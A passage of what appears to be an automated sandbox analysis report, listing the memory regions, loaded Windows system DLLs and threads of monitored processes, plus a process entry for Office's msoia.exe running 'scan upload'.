"\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3691 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3692 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3693 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3694 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3695 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3696 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3697 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3698 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3699 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3700 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3701 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3702 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3978 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3979 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3980 start_va = 0x160000 end_va = 0x166fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3981 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3982 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3983 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3984 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3985 start_va = 0x420000 end_va = 0x4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3986 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3987 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3988 start_va = 0x820000 end_va = 0xc12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 3989 start_va = 0xc60000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 3990 start_va = 0xce0000 end_va = 0xfaefff entry_point = 0xce0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3991 start_va = 0x7feeb820000 end_va = 0x7feeb901fff entry_point = 0x7feeb820000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 3992 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3993 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3994 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3995 start_va = 0xff0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 3996 start_va = 0x1000000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 3997 start_va = 0x1240000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3998 start_va = 0x14d0000 end_va = 0x15cffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 3999 start_va = 0x7fef8b20000 end_va = 0x7fef8bbffff entry_point = 0x7fef8b20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4000 start_va = 0x7fefa940000 end_va = 0x7fefa9e6fff entry_point = 0x7fefa940000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4001 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4002 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4003 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4004 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4005 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4006 start_va = 0x7fef9a00000 end_va = 0x7fef9d15fff entry_point = 0x7fef9a00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4095 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 4096 start_va = 0xc20000 end_va = 0xc20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 4097 start_va = 0xc30000 end_va = 0xc31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 4098 start_va = 0xc40000 end_va = 0xc47fff entry_point = 0xc40000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4099 start_va = 0xc50000 end_va = 0xc51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 4100 start_va = 0xfb0000 end_va = 0xfb3fff entry_point = 0xfb0000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4101 start_va = 0xfc0000 end_va = 0xfc3fff entry_point = 0xfc0000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4102 start_va = 0xfd0000 end_va = 0xfd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 4103 start_va = 0xfe0000 end_va = 0xfe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 4104 start_va = 0x1140000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 4105 start_va = 0x1340000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 4106 start_va = 0x14b0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 4107 start_va = 0x15d0000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 4108 start_va = 0x1710000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 4109 start_va = 0x1810000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x0000000001810000" filename = "" Region: id = 4110 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 4111 start_va = 0x1a90000 end_va = 0x1b4ffff entry_point = 0x1a90000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4112 start_va = 0x1c10000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 4113 start_va = 0x1d10000 end_va = 0x2052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 4114 start_va = 0x2210000 end_va = 0x221ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 4115 start_va = 0x2230000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 4116 start_va = 0x2320000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 4117 start_va = 0x24b0000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 4118 start_va = 0x25e0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 4119 start_va = 0x777b0000 end_va = 0x777b2fff entry_point = 0x777b0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4120 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4121 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4122 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4123 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4124 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4125 start_va = 0x7fef97e0000 end_va = 0x7fef99fcfff entry_point = 0x7fef97e0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4126 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4127 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4128 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4129 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4130 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4131 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4132 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4133 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4134 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4135 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4136 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4137 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4138 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4139 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4140 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4141 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4142 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4143 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4144 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4145 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4146 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4147 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4148 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4149 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4150 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4151 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4152 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4153 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4154 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4155 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4229 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 4230 start_va = 0x1110000 end_va = 0x1110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 4231 start_va = 0x1120000 end_va = 0x1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 4232 start_va = 0x2060000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 4233 start_va = 0x26e0000 end_va = 0x28dffff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 4234 start_va = 0x2960000 end_va = 0x2a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 4235 start_va = 0x2c10000 end_va = 0x2d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 4236 start_va = 0x2d50000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 4237 start_va = 0x2fb0000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x0000000002fb0000" filename = "" Region: id = 4238 start_va = 0x7fef3280000 end_va = 0x7fef3298fff entry_point = 0x7fef3280000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4239 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4240 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4241 start_va = 0x7fefadd0000 end_va = 0x7fefaddafff entry_point = 0x7fefadd0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4242 start_va = 0x7fefade0000 end_va = 0x7fefadf4fff entry_point = 0x7fefade0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4243 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4244 start_va = 0x7fefb4d0000 end_va = 0x7fefb4fbfff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4245 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4246 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4247 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4248 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4249 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4250 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4251 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4252 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4253 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4254 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4255 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4256 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4257 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4258 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4259 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4260 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Thread: id = 201 os_tid = 0x340 Thread: id = 264 os_tid = 0x91c Thread: id = 266 os_tid = 0x8d8 Thread: id = 271 os_tid = 0x638 Thread: id = 272 os_tid = 0xa04 Thread: id = 274 os_tid = 0x314 Thread: id = 276 os_tid = 0x690 Thread: id = 278 os_tid = 0x89c Thread: id = 279 os_tid = 0x8a0 Thread: id = 283 os_tid = 0x6d4 Thread: id = 284 os_tid = 0x5cc Thread: id = 285 os_tid = 0x40c Thread: id = 292 os_tid = 0x9e4 Thread: id = 295 os_tid = 0xab0 Thread: id = 297 os_tid = 0xbf4 Thread: id = 299 os_tid = 0x780 Process: id = "30" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x448cc000" os_pid = "0x848" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xb8c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3369 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3370 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3371 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3372 start_va = 